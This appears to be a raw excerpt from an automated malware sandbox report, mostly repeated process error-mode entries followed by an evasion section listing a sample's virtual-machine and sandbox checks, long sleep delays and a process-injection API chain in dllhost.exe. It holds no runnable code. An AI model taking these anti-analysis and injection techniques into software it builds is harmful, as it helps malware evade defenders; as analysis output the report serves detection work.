Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,37_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5496Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4394Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6260
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3426
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1584
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5517
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 445
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 409
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1650
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 626
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 385
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 378
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 372
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 366
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_34-245
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_18-17050
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.6 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.1 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 4.9 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\wbem\WMIADAP.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052Thread sleep count: 5496 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052Thread sleep count: 4394 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 7945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 1735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 1584 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 5517 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7012Thread sleep count: 280 > 30
Source: C:\Windows\System32\dllhost.exe TID: 6948Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1720Thread sleep count: 445 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1720Thread sleep time: -44500s >= -30000s
